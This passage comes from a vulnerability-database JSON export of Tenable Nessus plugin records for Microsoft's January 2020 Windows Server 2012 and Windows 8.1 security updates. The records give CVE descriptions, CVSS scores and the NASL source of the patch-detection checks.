and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534288: Windows Server 2012 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0609", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534283.NASL", "href": "https://www.tenable.com/plugins/nessus/132861", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132861);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534288\");\n script_xref(name:\"MSKB\", value:\"4534283\");\n script_xref(name:\"MSFT\", value:\"MS20-4534288\");\n script_xref(name:\"MSFT\", value:\"MS20-4534283\");\n\n script_name(english:\"KB4534288: Windows Server 2012 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534288\nor cumulative update 4534283. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\");\n # https://support.microsoft.com/en-us/help/4534288/windows-server-2012-update-kb4534288\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00a24f59\");\n # https://support.microsoft.com/en-us/help/4534283/windows-server-2012-update-kb4534283\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27812eb5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534288 or Cumulative Update KB4534283.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534288', '4534283');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534288, 4534283])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:32:48", "description": "The remote Windows host is missing security update 4534309\nor cumulative update 4534297. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)", "edition": 11, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534309: Windows 8.1 and Windows Server 2012 R2 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0609", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534297.NASL", "href": "https://www.tenable.com/plugins/nessus/132863", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132863);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/07\");\n\n script_cve_id(\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\"\n );\n script_xref(name:\"MSKB\", value:\"4534297\");\n script_xref(name:\"MSKB\", value:\"4534309\");\n script_xref(name:\"MSFT\", value:\"MS20-4534297\");\n script_xref(name:\"MSFT\", value:\"MS20-4534309\");\n script_xref(name:\"IAVA\", value:\"2020-A-0026\");\n\n script_name(english:\"KB4534309: Windows 8.1 and Windows Server 2012 R2 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534309\nor cumulative update 4534297. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534297/windows-8-1-kb4534297\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534309/windows-8-1-kb4534309\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534309 or Cumulative Update KB4534297.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534297', '4534309');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534297, 4534309])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-27T10:29:16", "description": "The remote Windows host is missing security update 4534306.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n 